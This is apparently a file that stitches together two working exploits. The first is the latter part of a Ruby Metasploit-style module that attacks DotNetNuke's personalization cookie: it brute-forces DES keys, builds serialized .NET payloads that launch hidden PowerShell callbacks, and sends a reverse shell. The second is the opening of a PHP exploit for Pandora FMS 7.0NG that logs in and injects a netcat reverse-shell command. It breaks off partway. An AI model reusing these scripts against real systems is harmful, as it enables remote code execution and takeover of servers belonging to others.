      98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97,
      116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 47, 83, 121, 115, 116, 101,
      109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109,
      98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97,
      116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 8, 0, 0, 0, 9, 9, 0, 0,
      0, 9, 10, 0, 0, 0, 4, 8, 0, 0, 0, 48, 83, 121, 115, 116, 101, 109, 46, 68,
      101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97,
      116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103,
      97, 116, 101, 69, 110, 116, 114, 121, 7, 0, 0, 0, 4, 116, 121, 112, 101, 8,
      97, 115, 115, 101, 109, 98, 108, 121, 6, 116, 97, 114, 103, 101, 116, 18,
      116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 65, 115, 115, 101, 109, 98,
      108, 121, 14, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 78, 97, 109,
      101, 10, 109, 101, 116, 104, 111, 100, 78, 97, 109, 101, 13, 100, 101, 108,
      101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 1, 1, 2, 1, 1, 1, 3, 48, 83,
      121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101,
      114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101,
      114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 6, 11,
      0, 0, 0, 176, 2, 83, 121, 115, 116, 101, 109, 46, 70, 117, 110, 99, 96, 51,
      91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32,
      109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111,
      110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114,
      101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99,
      75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49,
      57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 83,
      116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44,
      32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32,
      67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44,
      32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98,
      55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83,
      121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99,
      115, 46, 80, 114, 111, 99, 101, 115, 115, 44, 32, 83, 121, 115, 116, 101,
      109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46,
      48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114,
      97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101,
      110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93,
      93, 6, 12, 0, 0, 0, 75, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86,
      101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67,
      117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32,
      80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55,
      55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 10, 6, 13, 0, 0, 0,
      73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110,
      61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61,
      110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101,
      121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51,
      52, 101, 48, 56, 57, 6, 14, 0, 0, 0, 26, 83, 121, 115, 116, 101, 109, 46, 68,
      105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101,
      115, 115, 6, 15, 0, 0, 0, 5, 83, 116, 97, 114, 116, 9, 16, 0, 0, 0, 4, 9, 0,
      0, 0, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116,
      105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101,
      114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101,
      114, 7, 0, 0, 0, 4, 78, 97, 109, 101, 12, 65, 115, 115, 101, 109, 98, 108,
      121, 78, 97, 109, 101, 9, 67, 108, 97, 115, 115, 78, 97, 109, 101, 9, 83,
      105, 103, 110, 97, 116, 117, 114, 101, 10, 83, 105, 103, 110, 97, 116, 117,
      114, 101, 50, 10, 77, 101, 109, 98, 101, 114, 84, 121, 112, 101, 16, 71, 101,
      110, 101, 114, 105, 99, 65, 114, 103, 117, 109, 101, 110, 116, 115, 1, 1, 1,
      1, 1, 0, 3, 8, 13, 83, 121, 115, 116, 101, 109, 46, 84, 121, 112, 101, 91,
      93, 9, 15, 0, 0, 0, 9, 13, 0, 0, 0, 9, 14, 0, 0, 0, 6, 20, 0, 0, 0, 62, 83,
      121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99,
      115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83,
      121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121,
      115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 21, 0, 0, 0, 62,
      83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105,
      99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40,
      83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83,
      121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0,
      10, 1, 10, 0, 0, 0, 9, 0, 0, 0, 6, 22, 0, 0, 0, 7, 67, 111, 109, 112, 97,
      114, 101, 9, 12, 0, 0, 0, 6, 24, 0, 0, 0, 13, 83, 121, 115, 116, 101, 109,
      46, 83, 116, 114, 105, 110, 103, 6, 25, 0, 0, 0, 43, 73, 110, 116, 51, 50,
      32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46,
      83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83,
      116, 114, 105, 110, 103, 41, 6, 26, 0, 0, 0, 50, 83, 121, 115, 116, 101,
      109, 46, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83,
      121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121,
      115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1,
      16, 0, 0, 0, 8, 0, 0, 0, 6, 27, 0, 0, 0, 113, 83, 121, 115, 116, 101, 109,
      46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 96, 49, 91, 91, 83, 121,
      115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99,
      111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52,
      46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110,
      101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101,
      121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51,
      52, 101, 48, 56, 57, 93, 93, 9, 12, 0, 0, 0, 10, 9, 12, 0, 0, 0, 9, 24, 0,
      0, 0, 9, 22, 0, 0, 0, 10, 11
    ]

    @cr_regex = /(?<=Copyright \(c\) 2002-)(\d{4})/

    # ==================
    # v9.1.1+ VARIABLES
    # ==================


    @key_charset = "02468ABDF"
    @verification_codes = []

    @iv_regex = /[0-9A-F]{8}/

    # Known plaintext
    @kpt = ""

    # Encryption objects
    @decryptor = OpenSSL::Cipher.new('des')
    @decryptor.decrypt

    @encryptor = OpenSSL::Cipher.new('des')
    @encryptor.encrypt

    # final passphrase (key +iv) to use for payload (v9.1.1+)
    @passphrase = ""

    # ==================
    # v9.2.0+ VARIABLES
    # ==================

    # Session token needed for exploitation (v9.2.0+)
    @session_token = ""

    # ==================
    # v9.2.2+ VARIABLES
    # ==================

    # User ID format (v9.2.2+)
    # Number of characters of user ID available in plaintext
    # is equal to the length of a GUID (no spaces or dashes)
    # minus (blocksize - known plaintext length).
    @user_id_pt_length = 32 - (8 - @kpt.length)
    @user_id_regex = /[0-9a-f]{#{@user_id_pt_length}}/

    # Plaintext found from decryption (v9.2.2+)
    @found_pt = ""

    @iv_charset = "0123456789abcdef"

    # Possible IVs used to encrypt verification codes (v9.2.2+)
    @possible_ivs = Set.new([])

    # Possible keys used to encrypt verification codes (v9.2.2+)
    @possible_keys = Set.new([])

    # passphrases (key + iv) values to use for payload encryption (v9.2.2+)
    @passphrases = []

    # char sets to use when generating possible base keys
    @unchanged = Set.new([65,70])
  end

  def decode_verification(code)
    # Decode verification code base don DNN format
    return String.new(
      Rex::Text.decode_base64(
        code.chomp.gsub(".", "+").gsub("-", "/").gsub("_", "=")
      )
    )
  end

  # ==============
  # Main function
  # ==============
  def exploit

    return unless check == Exploit::CheckCode::Appears

    @encrypted = datastore['ENCRYPTED']
    verification_code = datastore['VERIFICATION_CODE']
    if File.file?(verification_code)
      File.readlines(verification_code).each do |code|
        @verification_codes.push(decode_verification(code))
      end
    else
      @verification_codes.push(decode_verification(verification_code))
    end

    @kpt = datastore['VERIFICATION_PLAIN']

    @session_token = datastore['SESSION_TOKEN']
    @dry_run = datastore['DryRun']
    key = datastore['KEY']
    iv = datastore['IV']

    if target['ReqEncrypt'] && @encrypted == false
      print_warning("Target requires encrypted payload. Exploit may not succeed.")
    end

    if @encrypted
      # Requires either supplied key and IV, or verification code and plaintext
      if (!key.blank? && !iv.blank?)
        @passphrase = key + iv
        # Key and IV were supplied, don't try and decrypt.
        @try_decrypt = false
      elsif (!@verification_codes.empty? && !@kpt.blank?)
        @try_decrypt = true
      else
        fail_with(Failure::BadConfig, "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).")
      end
    end

    if target['ReqSession']
      if @session_token.blank?
        fail_with(Failure::BadConfig, "Target requires a valid SESSION_TOKEN for exploitation.")
      end
    end

    if @encrypted && @try_decrypt
      # Set IV for decryption as the known plaintext, manually
      # apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed.
      # For v9.1.1 - v9.2.1 this will find the valid KEY and IV value in real time.
      # For v9.2.2+ it will find an initial base key faster than if padding were enabled.
      f8_plain = @kpt[0, 8]
      c_iv = f8_plain.unpack("C*") + [8 - f8_plain.length] * (8 - f8_plain.length)
      @decryptor.iv = String.new(c_iv.pack("C*"))
      @decryptor.padding = 0

      key = find_key(@verification_codes[0])
      if key.blank?
        return
      end

      if @target_idx == 4
        # target is v9.2.2+, requires base64 generated key and IV values.
        generate_base_keys(0, key.each_byte.to_a, "")
        vprint_status("Generated #{@possible_keys.size} possible base KEY values from #{key}")

        # re-enable padding here as it doesn't have the
        # same performance impact when trying to find possible IV values.
        @decryptor.padding = 1

        print_warning("Finding possible base IVs. This may take a few minutes...")
        start = Time.now
        find_ivs(@verification_codes, key)
        elapsed = Time.now - start
        vprint_status(
          format(
"Found %<n_ivs>d potential Base IV values using %<n_codes>d "\
"verification codes in %<e_time>.2f seconds.",
            n_ivs: @possible_ivs.size,
            n_codes: @verification_codes.size,
            e_time: elapsed.to_s
          )
        )

        generate_payload_passphrases
        vprint_status(format("Generated %<n_phrases>d possible base64 KEY and IV combinations.", n_phrases: @passphrases.size))
      end

      if @passphrase.blank?
        # test all generated passphrases by
        # sending an exploit payload to the target
        # that will callback to an HTTP listener
        # with the index of the passphrase that worked.

        # set SRVHOST as LHOST value for HTTPServer mixin
        datastore['SRVHOST'] = datastore['LHOST']
        print_warning("Trying all possible KEY and IV combinations...")
        print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
        start_service
        vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")

        test_passphrases

        # If no working passphrase has been found,
        # wait to allow the the chance for the last one to callback.
        if @passphrase.empty? && !@dry_run
          sleep(wfs_delay)
        end
        if service
          stop_service
        end
        print "\r\n"
        if !@passphrase.empty?
          print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
        end
      end
    end
    send_exploit_payload
  end

  # =====================
  # For the check command
  # =====================
  def check
    if target.name == 'Automatic'
      select_target
    end

    @target_idx = Integer(datastore['TARGET'])

    if @target_idx == 0
      fail_with(Failure::NoTarget, 'No valid target found or specified.')
    end

    # Check if 404 page is custom or not.
    # Vulnerability requires custom 404 handling (enabled by default).
    uri = normalize_uri(target_uri.path)
    print_status("Checking for custom error page at: #{uri} ...")
    res = send_request_cgi(
'uri' => uri
    )

    if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
      print_good("Custom error page detected.")
    else
      print_error("IIS Error Page detected.")
      return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Appears
  end

  # ===========================
  # Auto-select target version
  # ===========================
  def select_target
    print_status("Trying to determine DNN Version...")
    # Check for copyright version in /Documentation/license.txt
    uri = %r{^(.*[\\\/])}.match(target_uri.path)[0]
    vprint_status("Checking version at #{normalize_uri(uri + 'Documentation', 'License.txt')} ...")
    res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri + 'Documentation', 'License.txt')
    )
    year = -1
    if res && res.code == 200
      # License page found, get latest copyright year.
      matches = @cr_regex.match(res.body)
      if matches
        year = matches[0].to_i
      end
    else
      vprint_status("Checking version at #{uri} ...")
      res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri)
      )
      if res && res.code == 200
        # Check if copyright info is in page HTML.
        matches = @cr_regex.match(res.body)
        if matches
          year = matches[0].to_i
        end
      end
    end

    if year >= 2018
      print_warning(
        %q(DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN.
Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2.
Try setting target 4 and supply a file of of verification codes or specifiy valid Key and IV values.")
      )
      datastore['TARGET'] = 3
    elsif year == 2017
      print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED')
      datastore['TARGET'] = 2
    elsif year < 2017 && year > 2008
      print_good("DNN Version Found: v5.1.0 - v9.0.1")
      datastore['TARGET'] = 1
    elsif year == 2008
      print_warning("DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).")
      datastore['TARGET'] = 1
    else
      print_warning("Could not determine DNN version. Target may still be vulnerable. Manually set the Target value")
    end
  end

  # ==============================
  # Known plaintext attack to
  # brute-force the encryption key
  # ==============================
  def find_key(cipher_text)
    print_status("Finding Key...")

    # Counter
    total_keys = @key_charset.length**8
    i = 1

    # Set start time
    start = Time.now

    # First char
    @key_charset.each_byte do |a|
      key = a.chr
      # 2
      @key_charset.each_byte do |b|
        key[1] = b.chr
        # 3
        @key_charset.each_byte do |c|
          key[2] = c.chr
          # 4
          @key_charset.each_byte do |d|
            key[3] = d.chr
            # 5
            @key_charset.each_byte do |e|
              key[4] = e.chr
              # 6
              @key_charset.each_byte do |f|
                key[5] = f.chr
                # 7
                @key_charset.each_byte do |g|
                  key[6] = g.chr
                  # 8
                  @key_charset.each_byte do |h|
                    key[7] = h.chr
                    if decrypt_data_and_iv(@decryptor, cipher_text, String.new(key))
                      elapsed = Time.now - start
                      print_search_status(i, elapsed, total_keys)
                      print_line
                      if @target_idx == 4
                        print_good("Possible Base Key Value Found: " + key)
                      else
                        print_good("KEY Found: " + key)
                        print_good("IV Found: " + @passphrase[8..-1])
                      end
                      vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
                      vprint_status(format("Time to crack: %<c_time>.3f seconds", c_time: elapsed.to_s))
                      return String.new(key)
                    end
                    # Print timing info every 5 million attempts
                    if i % 5000000 == 0
                      print_search_status(i, Time.now - start, total_keys)
                    end
                    i += 1
                  end
                end
              end
            end
          end
        end
      end
    end
    elapsed = Time.now - start
    print_search_status(i, elapsed, total_keys)
    print_line
    print_error("Key not found")
    vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
    vprint_status(format("Time run: %<r_time>.3f seconds", r_time: elapsed.to_s))
    return nil
  end

  # ==================================
  # Attempt to decrypt a ciphertext
  # and obtain the IV at the same time
  # ==================================
  def decrypt_data_and_iv(cipher, cipher_text, key)
    cipher.key = key
    begin
      plaintext = cipher.update(cipher_text) + cipher.final
      if @target_idx == 4
        # Target is v9.2.2+
        user_id = plaintext[8, @user_id_pt_length]
        if @user_id_regex.match(user_id)
          return true
        end

        return false
      end

      # This should only execute if the version is 9.1.1 - 9.2.1
      iv = plaintext[0, 8]
      if !@iv_regex.match(iv)
        return false
      end

      # Build encryption passphrase as DNN does.
      @passphrase = key + iv

      # Encrypt the plaintext value using the discovered key and IV
      # and compare with the initial ciphertext
      if cipher_text == encrypt_data(@encryptor, @kpt, @passphrase)
        @passphrases.push(String.new(key + iv))
        return true
      end
    rescue StandardError
      # Ignore decryption errors to allow execution to continue
      return false
    end
    return false
  end

  def print_search_status(num_tries, elapsed, max_tries)
    msg = format("Searching at %<s_rate>.3f keys/s ...... %<p_complete>.2f%% of keyspace complete.", s_rate: num_tries / elapsed, p_complete: (num_tries / max_tries.to_f) * 100)
    print("\r%bld%blu[*]%clr #{msg}")
  end

  # ===========================
  # Encrypt data using the same
  # pattern that DNN uses.
  # ===========================
  def encrypt_data(cipher, message, passphrase)
    cipher.key = passphrase[0, 8]
    cipher.iv = passphrase[8, 8]
    return cipher.update(message) + cipher.final
  end

  # ===============================================
  # Generate all possible base key values
  # used to create the final passphrase in v9.2.2+.
  # DES weakness allows multiple bytes to be
  # interpreted as the same value.
  # ===============================================
  def generate_base_keys(pos, from_key, new_key)
    if !@unchanged.include? from_key[pos]
      if from_key[pos] % 2 == 0
        new_key[pos] = (from_key[pos] + 1).chr
      else
        new_key[pos] = (from_key[pos] - 1).chr
      end

      if new_key.length == 8
        @possible_keys.add(String.new(new_key))

        # also add key with original value
        new_key[pos] = (from_key[pos]).chr
        @possible_keys.add(String.new(new_key))
      else
        generate_base_keys(pos + 1, from_key, String.new(new_key))

        # also generate keys with original value
        new_key[pos] = (from_key[pos]).chr
        generate_base_keys(pos + 1, from_key, String.new(new_key))
      end
    else
      new_key[pos] = (from_key[pos]).chr
      if new_key.length == 8
        @possible_keys.add(String.new(new_key))
      else
        generate_base_keys(pos + 1, from_key, String.new(new_key))
      end
    end
  end

  # ==============================================
  # Find all possible base IV values
  # used to create the final Encryption passphrase
  # ==============================================
  def find_ivs(cipher_texts, key)
    num_chars = 8 - @kpt.length
    f8regex = /#{@kpt}[0-9a-f]{#{num_chars}}/

    @decryptor.key = key
    found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
    # Find all possible IVs for the first ciphertext
    brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])

    # Reduce IV set by testing against other ciphertexts
    cipher_texts.drop(1).each do |cipher_text|
      @possible_ivs.each do |iv|
        @decryptor.iv = iv
        pt = @decryptor.update(cipher_text) + @decryptor.final
        if !f8regex.match(pt[0, 8])
          @possible_ivs.delete(iv)
        end
      end
    end
  end

  # ==========================================
  # A recursive function to find all
  # possible valid IV values using brute-force
  # ==========================================
  def brute_force_ivs(pt_prefix, num_chars_needed, cipher_text, key, found_pt)
    charset = "0123456789abcdef"
    if num_chars_needed == 0
      @decryptor.key = key
      @decryptor.iv = pt_prefix
      pt = @decryptor.update(cipher_text) + @decryptor.final
      iv = pt[0, 8]
      if @iv_regex.match(iv)
        pt = pt_prefix + found_pt
        if encrypt_data(@encryptor, pt, key + iv) == cipher_text
          @possible_ivs.add(String.new(iv))
        end
      end
      return
    end
    charset.length.times do |i|
      brute_force_ivs(String.new(pt_prefix + charset[i]), num_chars_needed - 1, cipher_text, key, found_pt)
    end
  end

  # ========================================
  # Generate all possible payload encryption
  # passphrases for a v9.2.2+ target
  # ========================================
  def generate_payload_passphrases
    phrases = Set.new(@passphrases)
    @possible_keys.each do |key|
      @possible_ivs.each do |iv|
        phrase = Rex::Text.encode_base64(
          encrypt_data(@encryptor, key + iv, key + iv)
        )
        phrases.add(String.new(phrase[0, 16]))
      end
    end
    @passphrases = phrases.to_a
  end

  # ===========================================
  # Test all generated passphrases by initializing
  # an HTTP server to listen for a callback that
  # contains the index of the successful passphrase.
  # ===========================================
  def test_passphrases
    for i in 0..@passphrases.size - 1
      # Stop sending if we've found the passphrase
      if !@passphrase.empty?
        break
      end

      msg = format("Trying KEY and IV combination %<current>d of %<total>d...", current: i + 1, total: @passphrases.size)
      print("\r%bld%blu[*]%clr #{msg}")

      url = "#{get_uri}?#{get_resource.delete('/')}=#{i}"
      payload = create_request_payload(url)
      cookie = create_cookie(payload)

      # Encrypt cookie value
      enc_cookie = Rex::Text.encode_base64(
        encrypt_data(@encryptor, cookie, @passphrases[i])
      )
      if @dry_run
        print_line
        print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
        print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...")
        print_line(enc_cookie)
        break
      end
      execute_command(enc_cookie, host: datastore['RHOST'])
    end
  end

  # ===============================
  # Request handler for HTTP server.
  # ==============================
  def on_request_uri(cli, request)
    # Send 404 to prevent scanner detection
    send_not_found(cli)

    # Get found index - should be the only query string parameter
    if request.qstring.size == 1 && request.qstring[get_resource.delete('/').to_s]
      index = request.qstring[get_resource.delete('/').to_s].to_i
      @passphrase = String.new(@passphrases[index])
    end
  end

  # ==============================================
  # Create payload to callback to the HTTP server.
  # Note: This technically exploits the
  # vulnerability, but provides a way to determine
  # the valid passphrase needed to exploit again.
  # ==============================================
  def create_request_payload(url)
    psh_cmd = "/b /c start /b /min powershell.exe -nop -w hidden -noni -Command \"Invoke-WebRequest '#{url}'\""
    psh_cmd_bytes = psh_cmd.bytes.to_a

    cmd_size_bytes = write_encoded_int(psh_cmd.length)

    # Package payload into serialized object
    payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end

    object_size = write_encoded_int(payload_object.length)

    # Create the final seralized ObjectStateFormatter payload
    final_payload = @osf_header + object_size + payload_object

    b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
    return b64_payload
  end

  # =============================================
  # Reproduce the WriteEncoded method in
  # the native .NET ObjectStateFormatter.cs file.
  # =============================================
  def write_encoded_int(value)
    enc = []
    while (value >= 0x80)
      v = value | 0x80
      enc.push([v].pack("V")[0].unpack1("C*"))
      value >>= 7
    end
    enc.push([value].pack("V")[0].unpack1("C*"))
    return enc
  end

  # =================================
  # Creates the payload cookie
  # using the specified payload
  # =================================
  def create_cookie(payload)
    cookie = "<profile>"\
"<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\
"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\
"[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\
"Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\
"Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\
"<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
"<ProjectedProperty0>"\
"<MethodName>Deserialize</MethodName>"\
"<MethodParameters>"\
"<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\""\
"xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\""\
">#{payload}</anyType>"\
"</MethodParameters>"\
"<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\""\
"i:type=\"ObjectStateFormatter\" />"\
"</ProjectedProperty0>"\
"</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
"</item>"\
"</profile>"
    return cookie
  end

  # =========================================
  # Send the payload to the target server.
  # =========================================
  def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port })
    uri = normalize_uri(target_uri.path)

    res = send_request_cgi(
'uri' => uri,
'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};"
    )
    if !res
      fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.")
    elsif res.code == 404
      return true
    elsif res.code == 400
      fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
    else
      fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}")
    end
  end

  # ======================================
  # Create and send final exploit payload
  # to obtain a reverse shell.
  # ======================================
  def send_exploit_payload
    cmd_payload = create_payload
    cookie_payload = create_cookie(cmd_payload)
    if @encrypted
      if @passphrase.blank?
        print_error("Target requires encrypted payload, but a passphrase was not found or specified.")
        return
      end
      cookie_payload = Rex::Text.encode_base64(
        encrypt_data(@encryptor, cookie_payload, @passphrase)
      )
    end
    if @dry_run
      print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
      print_warning("Printing exploit cookie payload...")
      print_line(cookie_payload)
      return
    end

    # Set up the payload handlers
    payload_instance.setup_handler

    # Start the payload handler
    payload_instance.start_handler

    print_status("Sending Exploit Payload to: #{normalize_uri(target_uri.path)} ...")
    execute_command(cookie_payload, host: datastore['RHOST'])
  end

  # ===================================
  # Create final exploit paylod based on
  # supplied payload options.
  # ===================================
  def create_payload
    # Create payload
    psh_cmd = "/b /c start /b /min " + cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      remove_comspec: true, encode_final_payload: false
    )

    psh_cmd_bytes = psh_cmd.bytes.to_a
    cmd_size_bytes = write_encoded_int(psh_cmd.length)

    # Package payload into serialized object
    payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
    object_size = write_encoded_int(payload_object.length)

    # Create the final seralized ObjectStateFormatter payload
    final_payload = @osf_header + object_size + payload_object
    b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))

    vprint_status("Payload Object Created.")

    return b64_payload
  end
end

# Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution
# Build: PC170324 - MR 0
# Date: 2020-03-30
# Exploit Author: Basim Alabdullah
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
#
#                 Authenticated Remote Code Execution
#
#      Vulnerable file: extension/net_tools.php
#            Vulnerable Code:
#
#           $traceroute = whereis_the_command ('traceroute');
#      if (empty($traceroute)) {
#        ui_print_error_message(__('Traceroute executable does not exist.'));
#      }
#      else {
#        echo "<h3>".__("Traceroute to "). $ip. "</h3>";
#        echo "<pre>";
#     ---->  echo system ("$traceroute $ip");
#        echo "</pre>";
#
#                
<?php

error_reporting(0);
$username = $argv[2];
$password = $argv[3];
$url = $argv[1]."/index.php?login=1";
$postinfo = "nick=".$username."&pass=".$password."&login_button=Login";
$attackerip = $argv[4];
$attackerport = $argv[5];
$payload="127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}";

if(!empty($argv[1]))
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_NOBODY, false);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp");
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_REFERER, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo);
    curl_exec($ch);
    curl_close($ch);
    $ch1 = curl_init();
    curl_setopt($ch1, CURLOPT_HEADER, false);
    curl_setopt($ch1, CURLOPT_NOBODY, false);
    curl_setopt($ch1, CURLOPT_URL, $argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools");
    curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp");
